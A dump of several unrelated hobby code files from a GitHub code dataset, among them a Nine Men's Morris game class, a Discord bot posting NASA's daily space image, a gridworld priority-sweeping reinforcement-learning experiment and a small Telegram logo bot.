res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/0501-1000/0797_all-paths-from-source-to-target_1_AC.py","file_name":"0797_all-paths-from-source-to-target_1_AC.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"40577446693","text":"\"\"\"Nine Men's Morris routines.\n A) Class State\n A specializion of the StateSpace Class that is tailored to the game of Nine Men's Morris.\n B) class Direction\n An encoding of the directions of movement that are possible for players in Nine Men's Morris.\n\"\"\"\n\nfrom copy import deepcopy\n# Copy a new board from the old board\n# without aliasing to the old board\n\nimport re\n\nclass State:\n def __init__(self, player='u', is_new = False, grid=[], user_pieces_num=10, computer_pieces_num=10):\n \"\"\"\n Create a Nine Men's Morris state\n\n player: current user, user or computer.\n is_new: if we need to init the board.\n grid: board.\n piece_not_used: the number of pieces not being placed on grid.\n Cell Types:\n -1 means x (The cell is impossible to be reached by any player)\n 0 means empty (The cell is Unoccupied but is reachable by any player)\n 1 means u (The cell is currently occupied by the White player)\n 2 means c (The cell is currently occupied by the Black player)\n \"\"\"\n self.grid = []\n self.cell_types = {-1: 'x', 0: '_', 1: '♘', 2: '♖'}\n\n if player == 'c':\n self.current_player = 'c'\n self.current_player_key = 2\n self.opponent = 'u'\n self.opponent_player_key = 1\n else: \n self.current_player = 'u'\n self.current_player_key = 1\n\n self.opponent = 'c'\n self.opponent_player_key = 2\n\n if is_new:\n self.grid = [\n [0, -1, -1, 0, -1, -1, 0],\n [-1, 0, -1, 0, -1, 0, -1],\n [-1, -1, 0, 0, 0, -1, -1],\n [0, 0, 0, -1, 0, 0, 0],\n [-1, -1, 0, 0, 0, -1, -1],\n [-1, 0, -1, 0, -1, 0, -1],\n [0, -1, -1, 0, -1, -1, 0]\n ]\n else:\n self.grid = grid\n \n if self.current_player_key == 1:\n self.user_piece_not_used = user_pieces_num\n self.computer_piece_not_used = computer_pieces_num\n self.piece_not_used = self.user_piece_not_used\n else:\n self.computer_piece_not_used = computer_pieces_num\n self.user_piece_not_used = user_pieces_num\n self.piece_not_used = self.computer_piece_not_used\n\n self.winner = None\n\n if self.check_lose_state(self.grid, self.opponent_player_key): # check if current user wins.\n self.winner = self.current_player\n self.over = True\n else:\n self.over = False\n\n\n def check_lose_state(self, grid, player_key):\n \"\"\"\n Winning condition: \n opponent equals to 2 pieces on board, or\n opponent cannot move\n \n player: will be either 'c' or 'u'\n \n user: 1,\n computer: 2\n\n Return:\n True: the player loses\n False: the player does not lose (it does not mean it wins)\n \"\"\"\n\n if self.piece_not_used == 0 and self.pieces_left_onboard(player_key) == 2:\n return True\n else:\n # or if opponent cannot move, and it only happen in Phase 2 and 3, not 1.\n if self.piece_not_used == 0:\n opponent_key = 1 if player_key == 2 else 2\n\n # get_neighbors and check if can move.\n all_blocked = True\n all_cords = self.get_coords(player_key)\n for cord in all_cords:\n its_neighbors = self.get_neighbors(cord)\n for neighbor in its_neighbors:\n if not self.grid[neighbor[0]][neighbor[1]] == opponent_key: # if any of neighbors is not opponent.\n all_blocked = False\n break\n if not all_blocked:\n break\n return all_blocked\n else:\n return False\n \n def get_neighbors(self, piece_cord):\n \"\"\"\n Given a piece cordinates (x, y), output a dictionary of its neighbor cordinate tuples.\n\n Note that x is upper horizontal axis, and y is left vertical axis, say, (0, 0) is upper left corner.\n \"\"\"\n x = piece_cord[0]\n y = piece_cord[1]\n \n neighbors = []\n if x == 0 or x == 6:\n if y == 0 or y == 6:\n neighbors.append((3, y))\n neighbors.append((x, 3))\n elif y == 3:\n neighbors.append((x, 0))\n neighbors.append((x, 6))\n if x == 0: # (1, 3)\n neighbors.append((1, 3))\n elif x == 6: # (5, 3)\n neighbors.append((5, 3))\n elif x == 1 or x == 5:\n if y == 1 or y == 5:\n neighbors.append((3, y))\n neighbors.append((x, 3))\n elif y == 3:\n neighbors.append((x, 1))\n neighbors.append((x, 5))\n neighbors.append((x - 1, 3))\n neighbors.append((x + 1, 3))\n elif x == 2 or x == 4:\n if y == 2 or y == 4:\n neighbors.append((3, y))\n neighbors.append((x, 3))\n elif y == 3:\n neighbors.append((x, 2))\n neighbors.append((x, 4))\n if x == 2: # (2, 3)\n neighbors.append((1, 3))\n elif x == 4: # (4, 3)\n neighbors.append((5, 3))\n else: # x = 3\n if y == 0 or y == 6:\n neighbors.append((0, y))\n neighbors.append((6, y))\n if y == 0:\n neighbors.append((3, 1))\n elif y == 6: \n neighbors.append((3, 5))\n elif y == 1 or y == 5:\n neighbors.append((1, y))\n neighbors.append((5, y))\n neighbors.append((3, y - 1))\n neighbors.append((3, y + 1))\n elif y == 2 or y == 4:\n neighbors.append((2, y))\n neighbors.append((4, y))\n if y == 2: # (3, 2)\n neighbors.append((3, 1))\n elif y == 4: # (3, 5)\n neighbors.append((3, 5))\n # print(neighbors)\n return neighbors\n\n def get_neighbors_to_hash(self, piece_cord):\n lst = self.get_neighbors(piece_cord)\n res = {}\n for tup in lst:\n res[tup] = self.grid[tup[0]][tup[1]]\n return res\n\n def get_successors(self):\n \"\"\"\n Generate all the actions that can be performed from this state,\n and the states those actions will create.\n \n Pseudo-code:\n if not isAllUsed():\n place()\n else:\n if num_pieces > 3:\n move()\n elif num_pieces == 3:\n fly()\n elif num_pieces == 2:\n lose()\n # Means opponent wins\n else:\n raise error('Something is wrong')\n\n return get_next_states()\n \"\"\"\n\n successors = []\n\n if self.piece_not_used > 0: \n # Place\n for x in range(7):\n for y in range(7):\n if self.grid[x][y] == 0: # Unoccupied\n successors.append(('P', x, y))\n \n elif self.piece_not_used == 0:\n num_pieces = self.pieces_left_onboard(self.current_player_key)\n if num_pieces > 3:\n # Move\n coords = self.get_coords(self.current_player_key)\n for coord in coords:\n neighbors = self.get_neighbors_to_hash(coord)\n for neighbor in neighbors:\n x = neighbor[0]\n y = neighbor[1]\n if self.grid[x][y] == 0:\n successors.append(('M', x, y))\n # 'M' means to move a piece on the board\n # i.e. Place + Remove\n elif num_pieces == 3:\n # Fly\n for x in range(7):\n for y in range(7):\n if self.grid[x][y] == 0: # Unoccupied\n successors.append(('F', x, y))\n # 'F' means to fly a piece on the board\n # Similar to 'M' but when removing a piece,\n # we can remove any piece on the board\n # instead of in 'M' we have to remove its\n # neighbor (origin piece has also to be in its neighbors)\n elif num_pieces == 2:\n # Lose\n # It is checked in the next state\n # TODO: EFFICIENCY\n pass\n \n else:\n # Exception\n raise Exception('Number of pieces should be between 2-9, but found {}'.format(num_pieces))\n else:\n # Exception\n raise Exception('Piece not found should be >=0, but found {}'.format(piece_not_used))\n\n return self.get_next_states(successors)\n\n def get_next_states(self, instructions):\n \"\"\"\n Convert instruction and coordinates to actual state\n \"\"\"\n next_boards = []\n oppo_pieces_left = self.get_coords(self.opponent_player_key)\n\n for instruction, x, y in instructions:\n # instruction can be either P or M or F\n \n next_board = deepcopy(self.grid)\n\n # Place a piece\n next_board[x][y] = self.current_player_key\n\n # Get coords of pieces to be moved\n # according to the instruction\n if (instruction == 'P'): # Place\n # We do not remove pieces in \"Place\"\n # Just a placeholder for for-loop\n pieces = [('new','move')]\n elif (instruction == 'M'): # Move\n # Only neighbor pieces placed by the same player\n # can achieve the new state, thus remove it\n neighbors = self.get_neighbors_to_hash((x,y))\n pieces = list(filter(lambda key: neighbors[key] == self.current_player_key, neighbors))\n elif (instruction == 'F'): # Fly\n # Any pieces placed by the same player can be removed\n pieces = self.get_coords(self.current_player_key)\n else:\n # Error\n raise\n\n for x,y in pieces:\n\n new_board = deepcopy(next_board)\n\n # Move/Fly a piece means the same as\n # place a piece in a new coord (\"Place\")\n # and then remove the piece in the old coord (\"Remove\")\n # The \"Place\" has been finished above\n # the following just remove the old piece\n if instruction in ['M', 'F']:\n new_board[x][y] = 0\n\n # if (self.isMill(new_board, self.current_player_key)):\n # print(\"in computer get_next_state\", self.current_player_key)\n # print((sum(self.getMills(new_board, self.current_player_key)) > 0), (not self.getMills(new_board, self.current_player_key) == self.getMills(next_board, self.current_player_key)), (sum(self.getMills(new_board, self.current_player_key)) >= sum(self.getMills(next_board, self.current_player_key))))\n if (sum(self.getMills(new_board, self.current_player_key)) > 0) and \\\n (not self.getMills(new_board, self.current_player_key) == self.getMills(self.grid, self.current_player_key)) and \\\n (sum(self.getMills(new_board, self.current_player_key)) >= sum(self.getMills(self.grid, self.current_player_key))):\n\n # print(\"## Computer is forming a mill! ##\")\n # Mill: Remove a piece from opponents\n # with each piece removed as a new board\n # print(\"computer choose user's pieces...\", oppo_pieces_left)\n for x,y in oppo_pieces_left:\n next_mill_board = deepcopy(new_board)\n # Remove the original piece\n next_mill_board[x][y] = 0\n next_boards.append(next_mill_board)\n \n else:\n # Just append it\n next_boards.append(new_board)\n return next_boards\n \n def get_coords(self, player):\n \"\"\"\n Get the coordinates for all the pieces of \"player\" on the board\n \"\"\"\n # Source:\n # https://stackoverflow.com/questions/27175400/how-to-find-the-index-of-a-value-in-2d-array-in-python\n return [(ix,iy) for ix, row in enumerate(self.grid) for iy, i in enumerate(row) if i == player]\n\n def pieces_left_onboard(self, player):\n \"\"\"\n Get number of pieces left on the board for @player\n >>> pieces_left_onboard(self, 1) # meaning user pieces.\n 2\n \"\"\"\n # Flatten the board from 2D to 1D\n flattened = [item for sublist in self.grid for item in sublist]\n return sum(list(map(lambda piece: 1 if piece == player else 0, flattened)))\n\n def isMill(self, grid, player):\n \"\"\"\n B is the 7*7 board\n player means the letter representation of the player\n e.g. w (for white) or b (for black)\n\n >>> isMill(b, 1) # 1 for user; 2 for computer.\n False\n \"\"\"\n b = grid\n all_mill_possibilities = [ # 16 possibilities\n # Outer 3\n [b[0][0], b[3][0], b[6][0]], # every 3 pieces form an \"m\"\n [b[0][0], b[0][3], b[0][6]],\n [b[0][6], b[3][6], b[6][6]],\n [b[6][0], b[6][3], b[6][6]],\n # Middle 3\n [b[1][1], b[3][1], b[5][1]],\n [b[1][1], b[1][3], b[1][5]],\n [b[1][5], b[3][5], b[5][5]],\n [b[5][1], b[5][3], b[5][5]],\n # Inner 3\n [b[2][2], b[3][2], b[4][2]],\n [b[2][2], b[2][3], b[2][4]],\n [b[2][4], b[3][4], b[4][4]],\n [b[4][2], b[4][3], b[4][4]],\n # Cross 3\n [b[0][3], b[1][3], b[2][3]],\n [b[3][0], b[3][1], b[3][2]],\n [b[3][4], b[3][5], b[3][6]],\n [b[4][3], b[5][3], b[6][3]]\n ]\n\n # \"lambda p: p == player\" means each piece (e.g. b[0][0]) \n # returns true if it is occupied by the argument \"player\"\n # \"all(list(map(lambda p: p == player, m)))\" means each mill condition \"m\"\n # returns true iff ALL of them (e.g. [b[0][0], b[3][0], b[6][0]]) are true\n # \"lambda m: all(list(map(lambda p: p == player, m)\" means whether\n # each m forms a mill\n # \"True in ...\" means the board forms a mill as long as one of them is a mill\n return True in list(map(lambda m: all(list(map(lambda p: p == player, m))), all_mill_possibilities))\n\n def getMills(self, grid, player):\n \"\"\"\n B is the 7*7 board\n player means the letter representation of the player\n e.g. w (for white) or b (for black)\n\n >>> millCount(b, 1) # 1 for user; 2 for computer.\n 2 # forms 2 mills for user pieces.\n \"\"\"\n b = grid\n all_mill_possibilities = [ # 16 possibilities\n # Outer 3\n [b[0][0], b[3][0], b[6][0]], # every 3 pieces form an \"m\"\n [b[0][0], b[0][3], b[0][6]],\n [b[0][6], b[3][6], b[6][6]],\n [b[6][0], b[6][3], b[6][6]],\n # Middle 3\n [b[1][1], b[3][1], b[5][1]],\n [b[1][1], b[1][3], b[1][5]],\n [b[1][5], b[3][5], b[5][5]],\n [b[5][1], b[5][3], b[5][5]],\n # Inner 3\n [b[2][2], b[3][2], b[4][2]],\n [b[2][2], b[2][3], b[2][4]],\n [b[2][4], b[3][4], b[4][4]],\n [b[4][2], b[4][3], b[4][4]],\n # Cross 3\n [b[0][3], b[1][3], b[2][3]],\n [b[3][0], b[3][1], b[3][2]],\n [b[3][4], b[3][5], b[3][6]],\n [b[4][3], b[5][3], b[6][3]]\n ]\n\n # \"lambda p: p == player\" means each piece (e.g. b[0][0]) \n # returns true if it is occupied by the argument \"player\"\n # \"all(list(map(lambda p: p == player, m)))\" means each mill condition \"m\"\n # returns true iff ALL of them (e.g. [b[0][0], b[3][0], b[6][0]]) are true\n # \"lambda m: all(list(map(lambda p: p == player, m)\" means whether\n # each m forms a mill\n # \"True in ...\" means the board forms a mill as long as one of them is a mill\n return list(map(lambda m: all(list(map(lambda p: p == player, m))), all_mill_possibilities))\n \n # def hashable_state(self):\n # \"\"\"\n # Return a data item that can be used as a dictionary key to UNIQUELY represent a state.\n # \"\"\"\n # return hash((self.robot, frozenset(self.snowballs.items())))\n\n\n def state_string(self):\n \"\"\"\n Return a string representation of a state that can be printed to stdout.\n \"\"\"\n return self.grid\n\n def instructions(self):\n \"\"\"\n Given game phases, return different game instructions.\n \"\"\"\n if self.piece_not_used > 0:\n return \"Pieces not used up yet, give a position to put the piece on.\"\n elif self.piece_not_used == 0 and self.pieces_left_onboard(self.current_player_key) > 2:\n return \"Only allow moving the pieces.\"\n\n def __str__(self):\n \"\"\"\n Print the string representation of the state.\n \"\"\"\n result = ''\n for i in range(7):\n for j in range(7):\n result += ' ' + self.cell_types[self.grid[i][j]] + ' '\n result += '\\n'\n return result\n\n def printGrid(self, grid):\n \"\"\"\n Print the string representation of the state.\n \"\"\"\n result = ''\n for i in range(7):\n for j in range(7):\n result += self.cell_types[grid[i][j]] + ' '\n result += '\\n'\n return result\n \n def get_move(self, phase):\n\n if phase == 1:\n while True:\n new_move = input(\"Please type the cordinates of your position, e.g. 0,2, meaning (0, 2) of the grid, note that grid's start point sits at upper left corner.\\n\")\n if re.match(r\"\\d,\\s*\\d\", new_move):\n break\n else:\n print(\"Incorrect input, please try again.\")\n x = int(new_move.split(\",\")[0])\n y = int(new_move.split(\",\")[1])\n\n self.user_piece_not_used = max(self.user_piece_not_used - 1, 0)\n print(\"user remained...\", self.user_piece_not_used, \"; computer remained...\", self.computer_piece_not_used)\n\n return (-1, -1), (y, x) # use (-1, -1) represent placing a new piece.\n elif phase == 2 or phase == 3:\n while True:\n target_piece = input(\"Select the piece by inputing its cordinates.\")\n if re.match(r\"\\d,\\s*\\d\", target_piece):\n break\n else:\n print(\"Incorrect input, please try again.\")\n target_x = int(target_piece.split(\",\")[0])\n target_y = int(target_piece.split(\",\")[1])\n while True:\n new_move = input(\"Please type the cordinates of your intended new position for target piece at ({}, {}).\".format(target_x, target_y))\n if re.match(r\"\\d,\\s*\\d\", target_piece):\n break\n else:\n print(\"Incorrect input, please try again.\")\n move_x = int(new_move.split(\",\")[0])\n move_y = int(new_move.split(\",\")[1])\n\n self.user_piece_not_used = max(self.user_piece_not_used - 1, 0)\n print(\"user remained...\", self.user_piece_not_used, \"; computer remained...\", self.computer_piece_not_used)\n\n return (target_y, target_x), (move_y, move_x)\n\n\n \n\n def is_valid_move(self, cord, phase, target = (-1, -1)):\n \"\"\"\n Check if new_move's cord is valid given its current phase.\n \"\"\"\n if phase == 1:\n # place phase.\n return cord in self.get_coords(0)\n\n elif phase == 2:\n # move phase.\n # 1. target piece should be current player's piece \n # 2. target cord should be empty and at its neighbor.\n is_belong_player = self.grid[target[0]][target[1]] == self.current_player_key\n is_at_neighbor = cord in self.get_neighbors(target)\n\n print(target, self.get_neighbors(target))\n\n is_empty = cord in self.get_coords(0)\n # print(\"check is valid move...\", is_belong_player, is_at_neighbor, is_empty)\n return is_belong_player and is_at_neighbor and is_empty\n\n elif phase == 3:\n # fly phase.\n # 1. target piece should be current player's piece \n # 2. target cord should be empty.\n is_belong_player = self.grid[target[0]][target[1]] == self.current_player_key\n is_empty = cord in self.get_coords(0)\n return is_belong_player and is_empty\n\n def apply_target_and_move(self, target, new_move):\n \"\"\"\n Given current State, with new target piece and new_move coordinates to produce new State.\n\n 1. the target and new_move must be valid here, even not optimal.abs\n 2. Should handle the isMill situation here. \n Especially for user, ask for which piece to remove;\n for computer side, temporarily pick random piece to remove.\n \"\"\"\n # print(\"new_move...\", new_move)\n if target == (-1, -1):\n # in Phase 1, place a new piece at new_move position.\n new_grid = deepcopy(self.grid)\n new_grid[new_move[0]][new_move[1]] = self.current_player_key\n else:\n # in Phase 2 or 3, place piece at new_move and remove target positon.\n new_grid = deepcopy(self.grid)\n new_grid[target[0]][target[1]] = 0\n new_grid[new_move[0]][new_move[1]] = self.current_player_key\n \n # print(\"New game state after applying move...\", printGrid(new_grid))\n \n if (sum(self.getMills(new_grid, self.current_player_key)) > 0) and \\\n (not self.getMills(new_grid, self.current_player_key) == self.getMills(self.grid, self.current_player_key)) and \\\n (sum(self.getMills(new_grid, self.current_player_key)) >= sum(self.getMills(self.grid, self.current_player_key))):\n # if \n # 1. new_grid has mill. &&\n # 2. new_grid mills distribution not equal to self.grid's. &&\n # 3. new_grid mills count is larger than and equal to self.grid's.\n\n # check if current grid forms a mill. For user, ask for which one to remove; For computer, use functions from strategy heuristics.\n # print(\"applying move...check for mill\", self.isMill(new_grid, self.current_player_key))\n tmp = \"User\" if self.current_player == 'u' else \"Computer\"\n print(\"## {} is forming a mill! ##\".format(tmp))\n # print(\"current grid...\", new_grid)\n if self.current_player == 'u':\n # User pick a piece to remove.\n while True:\n target_piece = input(\"Select one opponent's piece to remove.\")\n target_x = int(target_piece.split(\",\")[0])\n target_y = int(target_piece.split(\",\")[1])\n if re.match(r\"\\d,\\s*\\d\", target_piece) and new_grid[target_y][target_x] == self.opponent_player_key:\n break\n else:\n print(\"Incorrect input, please try again.\")\n new_grid[target_y][target_x] = 0\n else:\n # Computer pick a piece by strategy.\n print(\"Computer will pick a piece by strategy...\")\n\n \n\n return State(self.opponent, is_new = False, grid = new_grid, user_pieces_num = self.user_piece_not_used, computer_pieces_num = self.computer_piece_not_used)\n\n\nif __name__ == '__main__':\n new_state = State()\n print(new_state.get_coords(1))","repo_name":"yanrs17/nine-mens-morris-solver","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":24370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"963126724","text":"import discord\nimport requests\nimport datetime\nimport dateutil.tz as dateutils\nimport time as tim\nimport re\nfrom discord.ext import commands, tasks\nfrom bs4 import BeautifulSoup\n\n\nasync def setup(bot):\n await bot.add_cog(space_images(bot))\n\n\ndef get_the_time():\n if tim.localtime().tm_isdst:\n BG_tz = dateutils.tzoffset('UTC', 60 * 60 * 3)\n else:\n BG_tz = dateutils.tzoffset('UTC', 60 * 60 * 2)\n\n return datetime.time(hour = 8,\\\n minute = 0,\\\n second = 15,\\\n tzinfo = BG_tz)\n\n\nclass space_images(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n the_time = get_the_time()\n\n\n async def get_space_img(self):\n response = requests.get(\"https://apod.nasa.gov/apod/astropix.html\")\n soup = BeautifulSoup(response.text, \"html.parser\")\n list_of_links = soup.find_all('a')\n\n data = []\n image_links = []\n\n for link in list_of_links:\n if re.search(\"image\", str(link)) != None:\n image_links.append(re.search(\"image\", str(link)).string)\n\n image_link = re.split('href=\"', image_links[0])[1]\n image_link = re.split('\"', image_link)[0]\n\n data.append(\"https://apod.nasa.gov/apod/\" + image_link)\n\n title = re.split(\"Image Credit\", soup.find_all('center')[1].text)[0]\n title = re.sub(\"\\n\", \" \", title).strip(\" \")\n\n data.append(title)\n\n explanation = None\n\n list_of_ps = soup.find_all('p')\n\n for paragraph in list_of_ps:\n if re.search(\"Explanation\", paragraph.text) != None:\n explanation = re.split(\"Explanation:\", paragraph.text)[1]\n explanation = re.split(\"Tomorrow\", explanation)[0]\n explanation = re.sub(\"\\n\", \" \", explanation).strip(\" \")\n\n # print(type(explanation), explanation)\n data.append(explanation)\n\n return data\n\n\n @commands.command( name = 'space_image',\n help = 'The bot show the daily space image from NASA.',\n brief = '- Shows the daily space image from NASA.')\n async def space_image_cmd(self, ctx):\n try:\n space_img_info = await self.get_space_img()\n explanation = \"\"\n # print(space_img_info[0], \"|\", space_img_info[1], \"|\", space_img_info[2])\n\n if len(space_img_info[2]) < 1024:\n explanation = space_img_info[2]\n else:\n explanation = \"https://apod.nasa.gov/apod/astropix.html\"\n \n embed = discord.Embed(title = space_img_info[1])\n embed.set_image(url = space_img_info[0])\n embed.add_field(name = \"Description\",\n value = explanation,\n inline = False)\n \n await ctx.send(embed = embed)\n except Exception as e:\n await ctx.send(\"[space_images] I broke down again\")\n await ctx.send(\"https://tenor.com/view/serio-no-nop-robot-robot-down-gif-12270251\")\n \n text_chan = self.bot.get_channel(548554244932894750)\n await text_chan.send(e)\n \n return\n \n @tasks.loop(time = the_time)\n async def good_morning_message(self):\n text_chan = self.bot.get_channel(337156974754136064)\n try:\n space_img_info = await self.get_space_img()\n explanation = \"\"\n # print(space_img_info[0], \"|\", space_img_info[1], \"|\", space_img_info[2])\n\n if len(space_img_info[2]) < 1024:\n explanation = space_img_info[2]\n else:\n explanation = \"https://apod.nasa.gov/apod/astropix.html\"\n \n embed = discord.Embed(title = space_img_info[1])\n embed.set_image(url = space_img_info[0])\n embed.add_field(name = \"Description\",\n value = explanation,\n inline = False)\n \n await text_chan.send(embed = embed)\n except Exception as e:\n await text_chan.send(\"[space_images] I broke down again\")\n await text_chan.send(\"https://tenor.com/view/serio-no-nop-robot-robot-down-gif-12270251\")\n \n text_chan = self.bot.get_channel(548554244932894750)\n await text_chan.send(e)\n \n self.the_time = get_the_time()\n self.good_morning_message.change_interval(time = self.the_time)\n\n return\n\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"space_images module is loaded.\")\n self.good_morning_message.start()\n\n\n @commands.command( name = 'tnext_si',\n help = 'The bot will print the time of the next space image.',\n brief = '- Prints the time of the next scheduled space image.')\n async def get_next_iteration(self, ctx):\n await ctx.send(\"I am scheduled to give you the next space image on \" +\\\n str(self.good_morning_message.next_iteration))\n\n","repo_name":"Dimitarleomitkov/DiscordListManagementBot","sub_path":"cogs/space_images.py","file_name":"space_images.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29972743181","text":"import heapq\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnum_rows = 5\nnum_cols = 5\n\nv_op = np.array([\n [4.0187, 4.5548, 5.1575, 5.8336, 6.4553],\n [4.3716, 5.0324, 5.8013, 6.6473, 7.3907],\n [3.8672, 4.3900, 0.0000, 7.5769, 8.4637],\n [3.4182, 3.8319, 0.0000, 8.5738, 9.6946],\n [2.9977, 2.9309, 6.0733, 9.6946, 0.0000]\n])\n\ndef oneDIdx(i, j):\n return int(i*num_rows + j)\n\ndef upIdx(s, i, j):\n if (i == 0) or (s == 22):\n return s\n return oneDIdx(i-1, j)\n\ndef rightIdx(s, i, j):\n if (j == num_cols-1) or (s == 11) or (s == 16):\n return s\n return oneDIdx(i, j+1)\n\ndef leftIdx(s, i, j):\n if (j == 0) or (s == 13) or (s == 18):\n return s\n return oneDIdx(i, j-1)\n\ndef downIdx(s, i, j):\n if (i == num_rows-1) or (s == 7):\n return s\n return oneDIdx(i+1, j)\n\ndef idIdx(s, i, j):\n return s\n\nact_dist = {\n 0 : {'a': [rightIdx, upIdx, downIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]},\n 1 : {'a': [leftIdx, upIdx, downIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]},\n 2 : {'a': [upIdx, rightIdx, leftIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]},\n 3 : {'a': [downIdx, rightIdx, leftIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]}\n }\n\ndef getState(cur_state, cur_act):\n\n act_to_func = {\n 0 : rightIdx,\n 1 : leftIdx,\n 2 : upIdx,\n 3 : downIdx\n }\n\n i = cur_state // num_rows\n j = cur_state % num_rows\n\n return act_to_func[cur_act](cur_state, i, j)\n\ndef getAllStates(cur_state, cur_act):\n st_list = []\n i = cur_state // num_rows\n j = cur_state % num_rows\n for av in range(4):\n s = act_dist[cur_act]['a'][av](cur_state, i, j)\n r = getReward(s)\n st_list.append((act_dist[cur_act]['p'][av], s, r))\n\n return st_list\n\n\ndef getAction(state, q, eps):\n max_act = max(q[state])\n max_act_ct = np.count_nonzero(q[state] == max_act)\n prob = [((1-eps)/max_act_ct)+(eps/4) if av == max_act else eps/4 for av in q[state]]\n return random.choices(population=[0, 1, 2, 3], weights=prob)[0]\n\ndef getPolicy(q, eps):\n pi = []\n for state in range(num_rows*num_cols):\n max_act = max(q[state])\n max_act_ct = np.count_nonzero(q[state] == max_act)\n pi.append([((1-eps)/max_act_ct)+(eps/4) if av == max_act else eps/4 for av in q[state]])\n return pi\n\ndef getReward(state):\n if state == 24:\n return 10\n elif state == 22:\n return -10\n return 0\n\ndef prioritySweep(eps, theta, max_iter):\n \n mse_list = []\n\n pq = []\n def priorityQueuePush(new_p, state):\n for idx, (old_p, s) in enumerate(pq):\n if s == state:\n if old_p <= new_p:\n break\n pq[idx] = (new_p, state)\n heapq.heapify(pq)\n break\n else:\n heapq.heappush(pq, (new_p, state))\n\n q = np.zeros((num_rows*num_cols, 4), dtype=\"float\")\n gamma = 0.9\n\n pred = {}\n for state in range(num_rows*num_cols):\n if state != 12 and state != 17 and state != 24:\n for action in [0, 1, 2, 3]:\n next_state = getState(state, action)\n if next_state in pred:\n pred[next_state].add((state, action))\n else:\n pred[next_state] = {(state, action)}\n \n while True:\n state = np.random.randint(num_rows*num_cols)\n while state == 12 or state == 17 or state == 24:\n state = np.random.randint(num_rows*num_cols)\n action = getAction(state, q, eps)\n next_state = getState(state, action)\n rew = getReward(next_state)\n q_old = q[state][action]\n q[state][action] = sum([prob*(rew + gamma*max(q[next_state])) for prob, next_state, rew in getAllStates(state, action)])\n p = q[state][action] - q_old\n if p > theta:\n if q_old == max(q[state]) or q[state][action] == max(q[state]):\n priorityQueuePush(-p, state)\n\n num_iter = 1\n while len(pq) > 0 and num_iter < max_iter:\n _, cur_state = heapq.heappop(pq)\n for pred_state, pred_act in pred[cur_state]:\n q_old = q[pred_state][pred_act]\n q[pred_state][pred_act] = sum([prob*(rew + gamma*max(q[next_state])) for prob, next_state, rew in getAllStates(pred_state, pred_act)])\n p = q[pred_state][pred_act] - q_old\n if p > theta:\n num_iter += 1\n if q_old == max(q[pred_state]) or q[pred_state][pred_act] == max(q[pred_state]):\n priorityQueuePush(-p, pred_state)\n \n v = np.sum(np.array(getPolicy(q, eps)) * q, axis=1)\n mse = np.sum((v_op.flatten() - v)**2) / 25\n mse_list.append(mse)\n if mse < 0.5:\n break\n eps = max(0.1, eps-0.02)\n\n print(np.sum(np.array(getPolicy(q, eps)) * q, axis=1))\n print(len(mse_list))\n return mse_list, q\n\neps = 1\nrepeat = 20\nmse_list = []\nmin_episodes = float(\"inf\")\nq_sum = np.zeros((num_rows*num_cols, 4), dtype=\"float\")\nfor i in range(repeat):\n print(i)\n mse, q = prioritySweep(eps, 0.1, 100)\n mse_list.append(mse)\n if len(mse) < min_episodes:\n min_episodes = len(mse)\n q_sum += q\n\nfor i in range(repeat):\n mse_list[i] = mse_list[i][:min_episodes]\nmse_list = np.sum(mse_list, axis = 0) / repeat\n\nplt.plot(range(min_episodes), mse_list)\nplt.xlabel(\"Number of Episodes\")\nplt.ylabel(\"Value Function - Mean Squared Error\")\nplt.savefig(\"ps_gridWorld\")\nplt.close()","repo_name":"satwikgoyal/RL-Algorithms-on-MC-and-Gridworld","sub_path":"Code/prioritySweep_gridWorld.py","file_name":"prioritySweep_gridWorld.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35545723864","text":"\n# standard libraries\nimport unittest\nfrom unittest import mock\nfrom unittest.mock import patch\n# local files\nfrom app import amp_gui\n\n\nclass TestUSBHandler(unittest.TestCase):\n @patch('builtins.print')\n def build_up(self, mock_print):\n root = amp_gui.ElectroChemGUI()\n return root, mock_print\n\n def test_cv_send_params(self):\n # done with app as a hack, fix this when more time\n app, mp = self.build_up() # type: amp_gui.ElectroChemGUI\n for call in mp.mock_calls:\n print(call)\n app.cv.device.send_cv_parameters()\n app.cv.settings.use_svw = True\n with mock.patch('builtins.print') as test_printer:\n # app.cv.run_button.invoke()\n app.cv.device.send_cv_parameters()\n\n print('=======')\n for call in test_printer.mock_calls:\n print(call)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"KyleLopin/Potentiostat_GUI","sub_path":"test_pre.py","file_name":"test_pre.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"25293993902","text":"from telegram.ext import Updater\nimport requests\n\nBOT_Token=\"7853451df5:SDSGHghjgjdsfgtyY0PXugoowhNL03vyI7w\"\nupdater = Updater(BOT_Token)\n\ndef incoming_message_action(update, context):\n image_url=requests.get('https://api.single-developers.software/logo?name='+(update.message.text).replace(' ','%20'))\n context.bot.sendPhoto(chat_id=update.message.chat.id, photo=image_url,\n reply_to_message_id=update.message.reply_to_message.message_id)\n\nupdater.dispatcher.add_handler( MessageHandler(Filters.text, incoming_message_action))\nupdater.start_polling()\nupdater.idle()\n","repo_name":"Single-Developers/API","sub_path":"logo/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"22004301350","text":"from h.db import db\nfrom h.models.task import Task, TaskState\nfrom h.models.list import List\nfrom h.models.board import Board\nfrom h.api import task_api as api\n\ntitle = 'title'\ndesc = 